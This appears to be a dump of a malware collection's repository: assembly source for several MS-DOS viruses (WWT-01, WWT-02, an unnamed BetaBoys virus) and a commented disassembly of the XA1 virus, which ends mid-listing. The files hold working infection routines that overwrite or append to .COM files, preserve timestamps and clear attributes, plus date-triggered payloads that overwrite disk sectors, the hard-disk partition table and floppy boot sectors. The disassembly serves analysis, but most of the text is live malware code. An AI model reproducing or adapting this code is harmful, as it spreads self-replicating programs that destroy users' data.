int 21h
mov ax,4200h
mov dx,0
mov cx,0
int 21h
pop ax
sub ax,3
mov byte ptr data_8+2Eh[si],al
mov byte ptr data_8+2Fh[si],ah
mov ah,40h
mov cx,3
lea dx,[si+148h]
int 21h
mov ax,4202h
mov dx,0
mov cx,0
int 21h
mov ah,40h
lea dx,[si+100h]
mov cx,data_12[si]
int 21h
mov ax,4000h
lea dx,[si+2C8h]
add dx,3
mov cx,3
int 21h
jmp short loc_9
db 90h
loc_9:
mov ah,3Eh
int 21h
mov ah,41h
lea dx,[si+137h]
int 21h
mov ah,2Ah
int 21h
cmp dh,2
jne loc_14
cmp dl,17h
je loc_10
cmp dl,18h
je loc_11
cmp dl,19h
je loc_12
jmp short loc_14
db 90h
loc_10:
mov ah,3Ch
lea dx,[si+119h]
mov cx,1
int 21h
jmp short loc_14
db 90h
loc_11:
mov ah,3Ch
lea dx,[si+129h]
mov cx,1
int 21h
jmp short loc_14
db 90h
loc_12:
mov al,2
loc_13:
mov cx,96h
mov dx,0
int 26h
inc al
cmp al,4
jne loc_13
loc_14:
mov cx,3
lea ax,[si+2C8h]
mov si,ax
mov di,100h
rep movsb
call sub_1
int 20h
ww endp
sub_1 proc near
mov di,offset start
jmp di
db 'Why Windows '
copyright db '(c)1992 MaZ / BetaBoys B.B'
db 90h, 90h, 90h
sub_1 endp
seg_a ends
end start
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

78
MSDOS/Virus.MSDOS.Unknown.wwt-01.asm Normal file
View File

@ -0,0 +1,78 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ WWT-01 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 15-Mar-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_009E_e equ 9Eh
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
wwt-01 proc far
start:
mov dx,offset data_013D
mov ah,4Eh ; 'N'
mov cx,1
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jnc loc_010E ; Jump if carry=0
jmp short loc_012C
loc_010E:
mov dx,data_009E_e
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_011A ; Jump if carry=0
jmp short loc_012C
loc_011A:
mov bx,ax
call sub_012E
mov dx,80h
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_012A ; Jump if carry=0
jmp short loc_012C
loc_012A:
jmp short loc_010E
loc_012C:
int 20h ; DOS program terminate
wwt-01 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_012E proc near
mov dx,100h
mov ah,40h ; '@'
mov cx,43h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
retn
sub_012E endp
data_013D db 2Ah
db 2Eh, 43h, 4Fh, 4Dh, 00h
seg_a ends
end start

73
MSDOS/Virus.MSDOS.Unknown.wwt-02.asm Normal file
View File

@ -0,0 +1,73 @@
; Virus name WWT-02
; Description Attack any COM file in current directory
; Comment Don't change Date/Time, ignore ReadOnly
; Date 19 Dec 1990 15:30
; Place CICTT
;
mov dx,offset FileMask ; FileMask for any COM file
mov ah,4eh ; Find first file
mov cx,1 ; including attrib Archive
int 21h ; Call DOS
jnc Ok ; If no error -> go on
jmp short Exit ; If error -> exit program
Ok
call Infect ; Do infection
DoNext
mov dx,80h ; Set DS:DX to DTA
mov ah,4fh ; Find Next file
int 21h ; Call DOS
jnc NextOk ; If no error -> go on
jmp short Exit ; If error -> exit
NextOk
jmp short Ok ; Still next file exist
Exit
int 20h ; Exit to DOS
Infect
mov dx,9eh ; Set DS:DX to filename in DTA
mov ax,4300h ; Get file attribute
int 21h ; Call DOS
mov Attrib,cx ; Save attribute for later
xor cx,cx ; New attribute -> normal file
mov ax,4301h ; Set attribute
int 21h ; Call DOS
mov ax,3d02h ; Open file for Read/Write
int 21h ; Call DOS
jc Exit ; If error -> exit
mov bx,ax ; Save handle
mov ax,5700h ; Get file Date/Time
int 21h ; Call DOS
mov Date,dx ; Save date
mov Time,cx ; Save time
mov dx,100h ; DS:DX point to itself
mov ah,40h ; Write to handle
mov cx,offset VirusSize-100h ; Write only virus
int 21h ; Call DOS
mov ax,5701h ; Restore Date/Time
mov cx,Time ; Old time
mov dx,Date ; Old time
int 21h ; Call DOS
mov ah,3eh ; Close file
int 21h ; Call DOS
mov dx,9eh ; Set DS:DX to filename in DTA
mov cx,Attrib ; Restore attribute
mov ax,4301h ; Set file attribute
int 21h ; Call DOS
ret ; Return to caller
FileMask
db '*.COM',0 ; File mask for any COM file
Date
dw ?
Time
dw ?
Attrib
dw ?
VirusSize
db ? ; Used to calculate virus
; size


909
MSDOS/Virus.MSDOS.Unknown.xa1.asm Normal file
View File

@ -0,0 +1,909 @@
;==============================================
; Virus XA1 isolated in Poland in June 1991
;
; disassembled by Andrzej Kadlof July 1991
;
; (C) Polish Section of Virus Information Bank
;==============================================
; virus entry point
0100 EB07 jmp 0109
0102 56 0A 03 59 00 ; first 7 bytes forms virus signature
0107 2A 00 ; generation counter, never used (?)
; prepare stack for tricks
; stack usage:
; [BP + 2] cleared but not used
; [BP + 0] offset in block
; [BP - 2] low byte of size of decrypted part and encryption key
0109 0E push cs ; make free space on stack
010A E80000 call 010D ; put current offset on the stack
010D FA cli ; disable interrupt to safe stack
010E 8BEC mov bp,sp
0110 58 pop ax
0111 32C0 xor al,al
0113 894602 mov [bp+02],ax ; corrupt debbuger return address ??
0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt
; encrypt virus code, this routine is changed in different virus copies
011B B9CE05 mov cx,05CE ; length of decrypted block
011E B08C mov al,8C ; 8C is changed!
0120 8846FF mov [bp-01],al
0123 8B5E00 mov bx,[bp] ; current position in block
; ^^ changed, possible 3 wariants:
; ..5E.. mov bx,[bp] versions 0, 1, 2
; ..76.. mov si,[bp] versions 3, 4, 5
; ..7E.. mov di,[bp] versions 6, 7, 8
0126 884EFE mov [bp-02],cl ; low byte of counter
0129 8A4EFF mov cl,[bp-01] ; encrypt key
012C D207 rol byte ptr [bx],cl ; byte manipulation
; ^^^^ changed, possible 9 wariants:
; 000F add byte ptr [bx],cl version 0
; 300F xor byte ptr [bx],cl version 1
; D2O7 rol byte ptr [bx],cl version 2
; 000C add byte ptr [si],cl version 3
; 300C xor byte ptr [si],cl version 4
; D204 rol byte ptr [si],cl version 5
; 000D add byte ptr [di],cl version 6
; 300D xor byte ptr [di],cl version 7
; D205 rol byte ptr [di],cl version 8
012E EB00 jmp 0130 ; short pause
0130 43 inc bx ; position in block
; ^^ changed, possible 3 wariants:
; 43 inc bx version 0, 1, 2
; 46 inc si version 3, 4, 5
; 47 inc di version 6, 7, 8
0131 8A4EFE mov cl,[bp-02] ; restore block size
0134 E2F0 loop 0126 ; offset is decrypted!
; encrypted part
0136 FB sti
; get address of curent DTA and store it on the stack
0137 B42F mov ah,2F
0139 CD21 int 21
013B 06 push es
013C 53 push bx
; get keyboard status bits
013D 33C0 xor ax,ax
013F 8ED8 mov ds,ax
0141 A01704 mov al,[0417]
0144 2410 and al,10 ; extract scroll lock state
0146 50 push ax ; store
0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag
; restore DS
014C 8CC8 mov ax,cs
014E 8ED8 mov ds,ax
; intercepte INT 24h
0150 BAC606 mov dx,06C6
0153 B82425 mov ax,2524 ; set interrupt vector
0156 CD21 int 21
; search for PATH= in environment block
0158 A12C00 mov ax,[002C] ; segment of environment block
015B 8EC0 mov es,ax
015D 33FF xor di,di ; begin of environment block
015F FC cld
0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker
0164 741D je 0183 ; end fo block
0166 BE1B05 mov si,051B ; offset of string 'PATH='
0169 B90500 mov cx,0005 ; length of string
016C 8BC7 mov ax,di ; starting address
016E F3A6 rep cmpsb ; compare
0170 7411 je 0183 ; found
0172 8BF8 mov di,ax ; last starting point
0174 32C0 xor al,al
0176 B5FF mov ch,FF ; maximum block size
0178 F2AE repnz scasb
017A 74E4 je 0160
017C BF1A05 mov di,051A ; end of buffer for path
017F 8CC8 mov ax,cs ; restore ES
0181 8EC0 mov es,ax
0183 C706C1056205 mov word ptr [05C1],0562
; set local DTA
0189 BA3605 mov dx,0536
018C B41A mov ah,1A ; set DTA
018E CD21 int 21
0190 A1F906 mov ax,[06F9]
0193 A3F706 mov [06F7],ax
0196 A1FD06 mov ax,[06FD]
0199 A3FB06 mov [06FB],ax
019C B90500 mov cx,0005 ; counter of potential victims
019F BA1505 mov dx,0515 ; '*.COM', 0
01A2 06 push es
01A3 57 push di
01A4 51 push cx
01A5 8CC8 mov ax,cs
01A7 8EC0 mov es,ax
01A9 B9FFFF mov cx,FFFF ; all possible attributes
01AC B44E mov ah,4E ; find first
01AE EB06 jmp 01B6
01B0 59 pop cx ; restore counter
01B1 E35B jcxz 020E ; limit reached, check show/destruction
01B3 B44F mov ah,4F ; find next
01B5 51 push cx ; store counter
01B6 CD21 int 21
01B8 7203 jb 01BD ; continue
01BA E9F100 jmp 02AE
; restore address of path in environment block
01BD 59 pop cx
01BE 5F pop di
01BF 07 pop es
01C0 26803D00 cmp es:byte ptr [di],00 ; end of block?
01C4 744A je 0210 ; yes
; copy path to buffer
01C6 BB6205 mov bx,0562 ; offset of buffer
01C9 268A05 mov al,es:[di] ; next character
01CC 0AC0 or al,al ; end of block?
01CE 740A je 01DA ; yes
01D0 47 inc di
01D1 3C3B cmp al,3B ; ';', end of path?
01D3 7405 je 01DA ; yes
01D5 8807 mov [bx],al ; copy character
01D7 43 inc bx ; increase pointer
01D8 EBEF jmp 01C9 ; get next character
01DA 81FB6205 cmp bx,0562 ; buffer not empty?
01DE 74E0 je 01C0 ; empty
01E0 8A47FF mov al,[bx-01]
01E3 3C3A cmp al,3A ; ':', root directory
01E5 7408 je 01EF ; yes
01E7 3C5C cmp al,5C ; check last character, '\'
01E9 7404 je 01EF ; there is
01EB C6075C mov byte ptr [bx],5C ; add '\'
01EE 43 inc bx ; pointer to last character
01EF 06 push es
01F0 57 push di
01F1 51 push cx
01F2 891EC105 mov [05C1],bx ; store it
01F6 8BF3 mov si,bx
01F8 81EB6205 sub bx,0562 ; find path length
01FC 8BCB mov cx,bx
01FE BF1405 mov di,0514 ; destination buffer
0201 8CC8 mov ax,cs ; restore ES
0203 8EC0 mov es,ax
0205 4E dec si
0206 FD std
0207 F3A4 rep movsb ; copy
0209 8BD7 mov dx,di
020B 42 inc dx
020C EB97 jmp 01A5 ; find first
; end of infection proces, check condition for destruction/show
020E 58 pop ax ; balance stack
020F 58 pop ax
0210 8CC8 mov ax,cs ; restore ES
0212 8EC0 mov es,ax
; get date
0214 B42A mov ah,2A ; get date
0216 CD21 int 21
0218 81FA0104 cmp dx,0401 ; April 1?
021C 7533 jne 0251 ; no
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B:
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
; copy partition table to sector 11h of side 0, track 0
021E BA8000 mov dx,0080 ; first hard drive
0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table)
0224 BB0307 mov bx,0703 ; destroy victim code
0227 B80102 mov ax,0201 ; read 1 sector
022A 52 push dx
022B 51 push cx
022C 53 push bx
022D CD13 int 13 ; disk I/O
022F 5B pop bx
0230 59 pop cx
0231 5A pop dx
0232 B111 mov cl,11 ; new place for partition table
0234 B80103 mov ax,0301 ; write partition table
0237 CD13 int 13
; set and of sector marker in the buffer
0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker
; overwrite partition table
023F B280 mov dl,80
0241 E87404 call 06B8 ; write one sector to disk
; overwrite boot sector of drive A:
0244 32D2 xor dl,dl
0246 E86F04 call 06B8 ; write one sector do disk
; overwrite boot sector of drive B:
0249 B201 mov dl,01
024B E86A04 call 06B8 ; write disk
024E EB0A jmp 025A
0250 90 nop
; compare date
0251 81FA180C cmp dx,0C18 ; december 24?
0255 7203 jb 025A ; date earlier
;<><><><<><><><><><><><><><><><><><><><>
;
; CHRISTMAS SHOW
;
; see the description of subroutine 05D7
;<><><><><><><><><><><><><><><><><><><><><>
0257 E87D03 call 05D7 ; drow christmas tree
; make sound
025A E440 in al,40
025C 3CF8 cmp al,F8
025E 7206 jb 0266
0260 E461 in al,61
0262 0C03 or al,03
0264 E661 out 61,al
; restore the state of scroll lock flag
0266 33C0 xor ax,ax
0268 8ED8 mov ds,ax
026A 58 pop ax
026B 08061704 or [0417],al
; restore INT 24h
026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP
0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP
0279 B82425 mov ax,2524 ; set interrupt vector
027C CD21 int 21
; restore DTA
027E 5A pop dx
027F 1F pop ds
0280 B41A mov ah,1A ; set DTA
0282 CD21 int 21
; restore DS
0284 8CC8 mov ax,cs
0286 8ED8 mov ds,ax
0288 BEF006 mov si,06F0
028B 8B3EF706 mov di,[06F7]
028F 033EFB06 add di,[06FB]
0293 57 push di
0294 B90700 mov cx,0007
0297 FC cld
0298 F3A4 rep movsb
029A 33C0 xor ax,ax
029C 8BD8 mov bx,ax
029E 8BD0 mov dx,ax
02A0 8BE8 mov bp,ax
02A2 8B36F706 mov si,[06F7]
02A6 BF0001 mov di,0100
02A9 8B0EFB06 mov cx,[06FB]
02AD C3 ret
02AE BE5405 mov si,0554 ; file name in FCB
02B1 8B3EC105 mov di,[05C1] ; address of destination
02B5 B90D00 mov cx,000D ; length of asciiz string
02B8 FC cld
02B9 F3A4 rep movsb ; copy
02BB BF2005 mov di,0520 ; buffer for file name
02BE E8FA01 call 04BB ; copy
02C1 7503 jne 02C6
02C3 E9EAFE jmp 01B0 ; find next/destruct/show
02C6 BF2B05 mov di,052B
02C9 E8EF01 call 04BB ; copy file name
02CC 7503 jne 02D1
02CE E9DFFE jmp 01B0 ; find next/destruct/show
02D1 C606610500 mov byte ptr [0561],00
02D6 90 nop
02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA
02DC 740F je 02ED ; hiden, system or read only, open file
02DE BA6205 mov dx,0562 ; file name
02E1 33C9 xor cx,cx ; clear all attributes
02E3 B80143 mov ax,4301 ; set file attributes
02E6 CD21 int 21
02E8 7303 jnb 02ED ; open file
02EA E9C3FE jmp 01B0 ; find next/destruct/show
02ED BA6205 mov dx,0562
02F0 B8023D mov ax,3D02 ; open file for read/write
02F3 CD21 int 21
02F5 8BD8 mov bx,ax ; handle
02F7 7303 jnb 02FC
02F9 E9B4FE jmp 01B0 ; find next
; check file size
02FC A15205 mov ax,[0552] ; high word of file size in DTA
02FF 0BC0 or ax,ax
0301 7403 je 0306 ; file below 64K
0303 E99001 jmp 0496 ; close file and find next
0306 A15005 mov ax,[0550] ; lower word of file size
0309 3D0700 cmp ax,0007 ; minimum file size
030C 72F5 jb 0303 ; close file and find next
030E 3D00F8 cmp ax,F800 ; maximum file size
0311 73F0 jnb 0303 ; close file and find next
; mayby already infected?
0313 8B16F706 mov dx,[06F7] ; form address of bufer
0317 0316FB06 add dx,[06FB]
031B B90700 mov cx,0007 ; number of bytes
031E 52 push dx
031F 51 push cx
0320 B43F mov ah,3F ; read file
0322 CD21 int 21
0324 59 pop cx
0325 5E pop si
0326 7208 jb 0330 ; read error, close and find next
; compare first 7 bytes with own code
0328 BF0001 mov di,0100 ; destination
032B FC cld
032C F3A6 rep cmpsb
032E 7503 jne 0333
0330 E96301 jmp 0496 ; close file and find next, (infected!)
; get and store file date and time
0333 B80057 mov ax,5700 ; get file time stamp
0336 CD21 int 21
0338 72F6 jb 0330 ; close file, find next
033A 89160107 mov [0701],dx ; store date
033E 890EFF06 mov [06FF],cx ; store time
0342 C606610501 mov byte ptr [0561],01
0347 90 nop
; check file size, if less than 603h bytes then append some garbage
0348 A15005 mov ax,[0550] ; file size
034B 3D0306 cmp ax,0603
034E 7321 jnb 0371
; file length is less than 603h, add some garbage
0350 33D2 xor dx,dx
0352 33C9 xor cx,cx
0354 B80242 mov ax,4202 ; move file ptr to EOF
0357 CD21 int 21
0359 7303 jnb 035E ; no errors, continue
035B E93801 jmp 0496 ; close file and find next
035E B90306 mov cx,0603 ; number of bytes
0361 2B0E5005 sub cx,[0550] ; file size
0365 B440 mov ah,40 ; write file
0367 CD21 int 21
0369 B80306 mov ax,0603 ; new file size
036C 7303 jnb 0371
036E E92501 jmp 0496 ; close file and find next
; now file is at least 603h bytes long
0371 FEC4 inc ah
0373 A3F906 mov [06F9],ax ; oryginal file size + 256
0376 A15005 mov ax,[0550] ; file size
0379 BE0306 mov si,0603 ; virus length
037C 33FF xor di,di
037E 3BC6 cmp ax,si
0380 7302 jnb 0384
0382 8BF0 mov si,ax
0384 8936FD06 mov [06FD],si
0388 8BD7 mov dx,di
038A 33C9 xor cx,cx
038C B80042 mov ax,4200 ; move file ptr to BOF
038F CD21 int 21
0391 7303 jnb 0396
0393 E90001 jmp 0496 ; close file and find next
0396 8B16F706 mov dx,[06F7]
039A 0316FB06 add dx,[06FB]
039E B90002 mov cx,0200
03A1 3BF1 cmp si,cx
03A3 7302 jnb 03A7
03A5 8BCE mov cx,si ; number of bytes
03A7 52 push dx
03A8 51 push cx
03A9 B43F mov ah,3F ; read file
03AB CD21 int 21
03AD 59 pop cx
03AE 5A pop dx
03AF 7303 jnb 03B4 ; continue
03B1 E9E200 jmp 0496 ; close file and find next
03B4 52 push dx
03B5 51 push cx
03B6 33D2 xor dx,dx
03B8 33C9 xor cx,cx
03BA B80242 mov ax,4202 ; move file ptr to EOF
03BD CD21 int 21
03BF 59 pop cx
03C0 5A pop dx
03C1 7303 jnb 03C6 ; continue
03C3 E9D000 jmp 0496 ; close file and find next
03C6 B440 mov ah,40 ; write file
03C8 CD21 int 21
03CA 7303 jnb 03CF
03CC E9C700 jmp 0496 ; close file and find next
03CF 81C70002 add di,0200
03D3 81EE0002 sub si,0200
03D7 7602 jbe 03DB
03D9 EBAD jmp 0388
03DB FF060701 inc word ptr [0107] ; infection counter
03DF 33D2 xor dx,dx
03E1 33C9 xor cx,cx
03E3 B80042 mov ax,4200 ; move file ptr to BOF
03E6 CD21 int 21
03E8 7303 jnb 03ED
03EA E9A900 jmp 0496 ; close file and find next
03ED 53 push bx ; store handle
03EE E440 in al,40
03F0 A807 test al,07
03F2 74FA je 03EE
03F4 A21F01 mov [011F],al ; change decryption key
; get random number from system timer count
03F7 33C0 xor ax,ax
03F9 8AF8 mov bh,al
03FB 8ED8 mov ds,ax
03FD A06C04 mov al,[046C] ; timer, low byte
0400 8CCA mov dx,cs ; restore DS
0402 8EDA mov ds,dx
; generate rundom number in BX in the range 0..8
0404 B103 mov cl,03
0406 F6F1 div cl ; AL <- AL/3, AH <- remainder
0408 8AEC mov ch,ah ; store remainder (0, 1 or 2)
040A 32E4 xor ah,ah ; prepare division
040C F6F1 div cl ; AL <- AL / 9, AH <- remainder
040E 8AC4 mov al,ah ; AL <- second remainder
0410 02C0 add al,al ; *2, AL in [0..4]
0412 02C4 add al,ah ; *3, AL in [0..6]
0414 02C5 add al,ch ; first remainder
0416 8AD8 mov bl,al ; BL in [0..8]
; multiply BX by 4 (table entry size)
0418 03DB add bx,bx
041A 03DB add bx,bx
041C 81C3C906 add bx,06C9 ; offset of table
; modify encryption routine (automodyfication)
0420 8A07 mov al,[bx]
0422 A22401 mov [0124],al ; 3 versions 5E/76/7E
0425 8B4701 mov ax,[bx+01]
0428 A32C01 mov [012C],ax ; 9 wersions
042B 8A4703 mov al,[bx+03] ; 3 versions
042E A23001 mov [0130],al
0431 8AC5 mov al,ch
; prepare decrypt routine
0433 BBED06 mov bx,06ED
0436 D7 xlat
0437 A26104 mov [0461],al ; modify decryption routine
; write new encryption routine to file
043A 5B pop bx ; restore handle
043B BA0001 mov dx,0100 ; begin of file
043E B93500 mov cx,0035 ; block size
0441 B440 mov ah,40 ; write file
0443 CD21 int 21
0445 724F jb 0496 ; close file and find next
; decryption routine
0447 BE3501 mov si,0135 ; start of decrypted block
044A B9CE05 mov cx,05CE ; size of decrypted block
044D 53 push bx ; store handle
044E 51 push cx
044F B80002 mov ax,0200
0452 8B1EF706 mov bx,[06F7]
0456 031EFB06 add bx,[06FB]
045A 53 push bx
045B 8A0E1F01 mov cl,[011F] ; decription key
045F 8A2C mov ch,[si]
0461 D2CD ror ch,cl ; <-- changed (3 variants)
; ^^ changed byte, possible wariants:
; 28CD sub ch,cl versions: 0, 3, 6
; 30CD xor ch,cl versions: 1, 4, 7
; D2CD ror ch,cl versions: 2, 5, 8
0463 882F mov [bx],ch
0465 43 inc bx
0466 46 inc si
0467 48 dec ax
0468 75F5 jne 045F
046A 5A pop dx
046B 59 pop cx
046C 5B pop bx
046D 51 push cx
046E 81F90102 cmp cx,0201
0472 7203 jb 0477
0474 B90002 mov cx,0200
0477 B440 mov ah,40 ; write file
0479 CD21 int 21
047B 59 pop cx
047C 7218 jb 0496 ; close file and find next
047E 81E90002 sub cx,0200
0482 77C9 ja 044D
; restore file time stamp
0484 8B160107 mov dx,[0701] ; file date
0488 8B0EFF06 mov cx,[06FF] ; file time
048C B80157 mov ax,5701 ; set file time stamp
048F CD21 int 21
0491 7203 jb 0496 ; close file and find next
; decrease counter on the stack
0493 59 pop cx
0494 49 dec cx
0495 51 push cx
0496 B43E mov ah,3E ; close file
0498 CD21 int 21
049A 8A0E4B05 mov cl,[054B] ; attributes
049E FE0E6105 dec byte ptr [0561]
04A2 7405 je 04A9
04A4 F6C107 test cl,07 ; hidden, system, read only
04A7 740F je 04B8
04A9 80F920 cmp cl,20 ; archive
04AC 740A je 04B8
04AE BA6205 mov dx,0562 ; file name
04B1 32ED xor ch,ch
04B3 B80143 mov ax,4301 ; set file attributes
04B6 CD21 int 21
04B8 E9F5FC jmp 01B0 ; find next
;----------------------------------------
; move 11 bytes do DS:DI ('C:\COMMAND.')
04BB BE6205 mov si,0562
04BE B90B00 mov cx,000B
04C1 FC cld
04C2 F3A6 rep cmpsb
04C4 C3 ret
; buffer for path
04C5 30 31 32 33 34 35 36 37 01234567
04CD 38 39 30 31 32 33 34 35 89012345
04D5 36 37 38 39 30 31 32 33 67890123
04DD 34 35 36 37 38 39 30 31 45678901
04E5 32 33 34 35 36 37 38 39 23456789
04ED 30 31 32 33 34 35 36 37 01234567
04F5 38 39 30 31 32 33 34 35 89012345
04FD 36 37 38 43 3A 5C 4A 45 678C:\JE
0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P
050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\
; paterns for search
0515 2A 2E 43 4F 4D 00 50 41 *.COM PA
051D 54 48 3D TH=
; buffers for file names
0520 49 42 4D 42 49 IBMBI
0525 4F 2E 43 4F 4D 00 O.COM
052B 49 42 IB
052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM
0535 00
; local DTA
0536 03 3F 3F 3F 3F 3F 3F ;\
053D 3F 3F 43 4F 4D FF 02 00 ; | reserved
0545 00 00 00 00 00 00 ;/
054B 20 ; file attribute
054C 00 60 71 0E ; file time stamp
0550 DB 62 00 00 ; file size
0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0)
0561 01 ; flag: attributes are changed
0562 43 3A 5C C:\
0565 43 4F 4D 4D 41 4E 44 2E COMMAND.
056D 43 4F 4D 00 00 4D 00 00 COM M
0575 00 2E 43 4F 4D 00 4F 68 .COM Oh
057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo
059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh
05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
05BD 68 4E 6F 21 hNo!
05C1 65 05 ;
;---------------------------------------
; write character (or space) cx times
05C3 B020 mov al,20
05C5 50 push ax
05C6 E89E00 call 0667 ; write character
05C9 58 pop ax
05CA E2F9 loop 05C5
05CC C3 ret
;-------------
; next line
05CD B00D mov al,0D
05CF E89500 call 0667 ; write character
05D2 B00A mov al,0A
05D4 E99000 jmp 0667 ; write character
;------------------------------
; drow christmast tree
;
; result will look like this:
;
;
; ­
; ***
; *****
; *******
; *********
; ***********
; *************
; ***************
; *****************
; *******************
; *********************
; ***********************
; *************************
; ***************************
; *****************************
; ÛÛÛ
; ÛÛÛ
; ÛÛÛ
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; Und er lebt doch noch : Der Tannenbaum !
; Frohe Weihnachten ...
;
05D7 B92700 mov cx,0027
05DA E8E6FF call 05C3 ; clear 39 characters
05DD B0AD mov al,AD ; '­'
05DF E88500 call 0667 ; write character
05E2 E8E8FF call 05CD ; new line
05E5 BB0300 mov bx,0003
05E8 BA2600 mov dx,0026
05EB 8BCA mov cx,dx
05ED E8D3FF call 05C3 ; write CX spaces
05F0 8BCB mov cx,bx
05F2 B02A mov al,2A ; '*'
05F4 E8CEFF call 05C5 ; write CX characters
05F7 E8D3FF call 05CD ; new line
05FA 4A dec dx
05FB 83C302 add bx,0002
05FE 83FB1F cmp bx,001F
0601 75E8 jne 05EB
0603 BB0300 mov bx,0003
0606 B92600 mov cx,0026
0609 E8B7FF call 05C3 ; write CX spaces
060C B90300 mov cx,0003
060F B0DB mov al,DB ; 'Û'
0611 E8B1FF call 05C5 ; write CX characters
0614 E8B6FF call 05CD ; next line
0617 4B dec bx
0618 75EC jne 0606
061A B95000 mov cx,0050 ; full line
061D B0CD mov al,CD ; 'Í'
061F E8A3FF call 05C5 ; write character CX times
0622 B91300 mov cx,0013
0625 E89BFF call 05C3 ; write CX spaces
0628 BB7406 mov bx,0674 ; string: Und er lebt doch ...
062B E82C00 call 065A ; write string
062E B91D00 mov cx,001D
0631 E88FFF call 05C3 ; clear part of line
0634 EB24 jmp 065A ; write asciiz string pointed by BX
0636 90 nop
0637 E80000 call 063A
063A 5B pop bx
063B 83C30D add bx,000D
063E 8CC8 mov ax,cs
0640 8ED8 mov ds,ax
0642 E81500 call 065A ; write string
0645 EBFE jmp 0645 ; hang CPU
0647 41 70 72 69 6C 2C 20 41 April, A
064F 70 72 69 6C 20 2E 2E 2E pril ...
0657 20 07 00
;-----------------------------------
; write asciiz string pointed by BX
065A 8A07 mov al,[bx] ; get character
065C 43 inc bx ; next character
065D 0AC0 or al,al ; and of string?
065F 7405 je 0666 ; yes, RET
0661 E80300 call 0667 ; write character
0664 EBF4 jmp 065A ; get next character
0666 C3 ret
;--------------------
; write character TTL
0667 52 push dx
0668 51 push cx
0669 53 push bx
066A 32FF xor bh,bh
066C B40E mov ah,0E
066E CD10 int 10
0670 5B pop bx
0671 59 pop cx
0671 59 pop cx
0672 5A pop dx
0673 C3 ret
0674 55 6E 64 20 65 72 20 6C Und er l
067C 65 62 74 20 64 6F 63 68 ebt doch
0684 20 6E 6F 63 68 20 3A 20 noch :
068C 44 65 72 20 54 61 6E 6E Der Tann
0694 65 6E 62 61 75 6D 20 21 enbaum !
069C 0D 0A 00 46 72 6F 68 65 Frohe
06A4 20 57 65 69 68 6E 61 63 Weihnac
